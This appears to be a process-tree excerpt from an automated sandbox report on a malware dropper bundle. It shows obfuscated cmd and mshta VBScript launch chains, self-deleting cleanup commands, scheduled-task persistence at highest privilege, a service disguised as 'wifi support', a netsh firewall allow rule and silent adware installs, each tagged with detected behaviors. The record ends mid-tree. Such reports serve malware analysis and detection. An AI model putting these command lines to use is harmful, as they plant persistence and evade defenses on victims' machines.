                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\lb5kyYz1l6lXrh06GwFJJdvz.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\lb5kyYz1l6lXrh06GwFJJdvz.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:7856
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                                                                                          WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:7676
                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:9044
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:8424
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:7328
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:8992
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                    taskkill -IM "lb5kyYz1l6lXrh06GwFJJdvz.exe" -f
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:7652
                                                                                                                                                                                                            • C:\Users\Admin\Documents\brQfpKYjHUgCJ3x4G1b8KF8z.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\brQfpKYjHUgCJ3x4G1b8KF8z.exe"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:7180
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "brQfpKYjHUgCJ3x4G1b8KF8z.exe" /f & erase "C:\Users\Admin\Documents\brQfpKYjHUgCJ3x4G1b8KF8z.exe" & exit
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:7120
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /im "brQfpKYjHUgCJ3x4G1b8KF8z.exe" /f
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:4280
                                                                                                                                                                                                                • C:\Users\Admin\Documents\fUNFu5I820YRmsjA42kCa8_q.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Documents\fUNFu5I820YRmsjA42kCa8_q.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:7172
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im fUNFu5I820YRmsjA42kCa8_q.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\fUNFu5I820YRmsjA42kCa8_q.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:8580
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          taskkill /im fUNFu5I820YRmsjA42kCa8_q.exe /f
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          PID:8804
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                          timeout /t 6
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                          PID:4740
                                                                                                                                                                                                                    • C:\Users\Admin\Documents\Jb3JRAaoYEZz0yT7QuntKBww.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Documents\Jb3JRAaoYEZz0yT7QuntKBww.exe"
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:6680
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 664
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:6888
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 672
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:7296
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 680
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:5864
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6680 -s 656
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                          PID:7376
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Xk6Z9vGV_WcRfec1rDtQqJZb.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\Xk6Z9vGV_WcRfec1rDtQqJZb.exe"
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:6040
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\D_zxa0i0vDLNhklWDfZYwhgr.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\D_zxa0i0vDLNhklWDfZYwhgr.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:5872
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\D_zxa0i0vDLNhklWDfZYwhgr.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\D_zxa0i0vDLNhklWDfZYwhgr.exe"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:784
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\qKds210k1a3jl4kYaCFgKhWP.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\qKds210k1a3jl4kYaCFgKhWP.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:4800
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\UmJagMk303ouMpgHhEbPHVNz.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\UmJagMk303ouMpgHhEbPHVNz.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:4720
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\UmJagMk303ouMpgHhEbPHVNz.exe
                                                                                                                                                                                                                                C:\Users\Admin\Documents\UmJagMk303ouMpgHhEbPHVNz.exe
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:7324
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 24
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:7956
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\0HmM9KhG8GrOlaq68XzM31B0.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\0HmM9KhG8GrOlaq68XzM31B0.exe"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:6908
                                                                                                                                                                                                                              • C:\Users\Admin\Documents\dZ1mX9jY5Tm4IhUstI98lafT.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Documents\dZ1mX9jY5Tm4IhUstI98lafT.exe"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                PID:6924
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\dZ1mX9jY5Tm4IhUstI98lafT.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\dZ1mX9jY5Tm4IhUstI98lafT.exe"
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:7932
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\uWD_aGrz1nu7Sjdk9GNpZdaU.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\uWD_aGrz1nu7Sjdk9GNpZdaU.exe"
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:6892
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 476
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                      PID:8128
                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\B5Dwtsmb_FJUcX40pUBU0b6x.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\B5Dwtsmb_FJUcX40pUBU0b6x.exe"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                    PID:6464
                                                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                  PID:5776
                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:8004
                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:5468
                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:4384
                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:5312
                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                    PID:5176
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548205 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:9084
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks.exe /create /tn "TR8g17Dv7mJghqUGd9HkpKSU" /sc ONLOGON /tr "'C:\Users\Admin\Documents\6V7JA25e8FLxTqcY9VUfhNfn\TR8g17Dv7mJghqUGd9HkpKSU.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:5656
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks.exe /create /tn "ARohJFQ8u4iFdmtbYV248Hj4" /sc ONLOGON /tr "'C:\Users\Admin\Documents\S_f8xubTLImR1ibutp_6X5cP\ARohJFQ8u4iFdmtbYV248Hj4.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:6056
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-URU0S.tmp\VPN.tmp
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-URU0S.tmp\VPN.tmp" /SL5="$1039A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                  PID:64
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-DO2KU.tmp\Setup.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-DO2KU.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:7072
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-MG9KN.tmp\Setup.tmp
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-MG9KN.tmp\Setup.tmp" /SL5="$105A4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-DO2KU.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                      PID:7132
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                          PID:9136
                                                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                            tapinstall.exe remove tap0901
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:8980
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                              PID:8260
                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:8860
                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:7108
                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:6748
                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              PID:4164
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                PID:4804
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "TR8g17Dv7mJghqUGd9HkpKSU" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\TR8g17Dv7mJghqUGd9HkpKSU.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                              PID:5208
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                              PID:3412
                                                                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                                                                                              PID:7588
                                                                                                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 6DA3CA6013D1F57A66A439B5938AB527 C
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:6036
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 32ED68A2BA4331AD7512A9E9CBFED6FD C
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:8232
                                                                                                                                                                                                                                                  • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                    C:\Windows\syswow64\MsiExec.exe -Embedding FB4BBB57AF1B9BF1EE23A77BD3C27006 C
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:8244
                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 9B7D769D3C5C481B387CD8C390BF9A22
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:6968
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-KC9C5.tmp\eFVkc3uXMi_1qQWcg4LqnvUt.tmp
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-KC9C5.tmp\eFVkc3uXMi_1qQWcg4LqnvUt.tmp" /SL5="$1064E,138429,56832,C:\Users\Admin\Documents\eFVkc3uXMi_1qQWcg4LqnvUt.exe"
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                      PID:7768
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-0BQO2.tmp\Setup.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-0BQO2.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:7256
                                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:3248
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548205 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:6896
                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                            schtasks.exe /create /tn "X2Lb1k5RXSFu6q3pmKltwAZe" /sc ONLOGON /tr "'C:\Users\Admin\Documents\EnableReceive\X2Lb1k5RXSFu6q3pmKltwAZe.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:3024
                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                            PID:2492
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              PID:6800
                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                            schtasks.exe /create /tn "zmcsEZr47Ce9QDf0GVOA6xks" /sc ONLOGON /tr "'C:\Users\Admin\Documents\D_zxa0i0vDLNhklWDfZYwhgr\zmcsEZr47Ce9QDf0GVOA6xks.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                            PID:3248
                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                            PID:7564
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:8788
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BDD4.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BDD4.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:8120
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CFC7.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\CFC7.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:8564
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\zgrfifnm\
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:6376
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vmmfvuvj.exe" C:\Windows\SysWOW64\zgrfifnm\
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:8412
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" create zgrfifnm binPath= "C:\Windows\SysWOW64\zgrfifnm\vmmfvuvj.exe /d\"C:\Users\Admin\AppData\Local\Temp\CFC7.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:7172
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:7248
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" description zgrfifnm "wifi internet conection"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:8124
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" start zgrfifnm
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:8376
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DF48.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\DF48.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:4112
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F5BF.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F5BF.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:8708
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11B.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11B.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:4936
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11B.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\11B.exe"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:6400
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
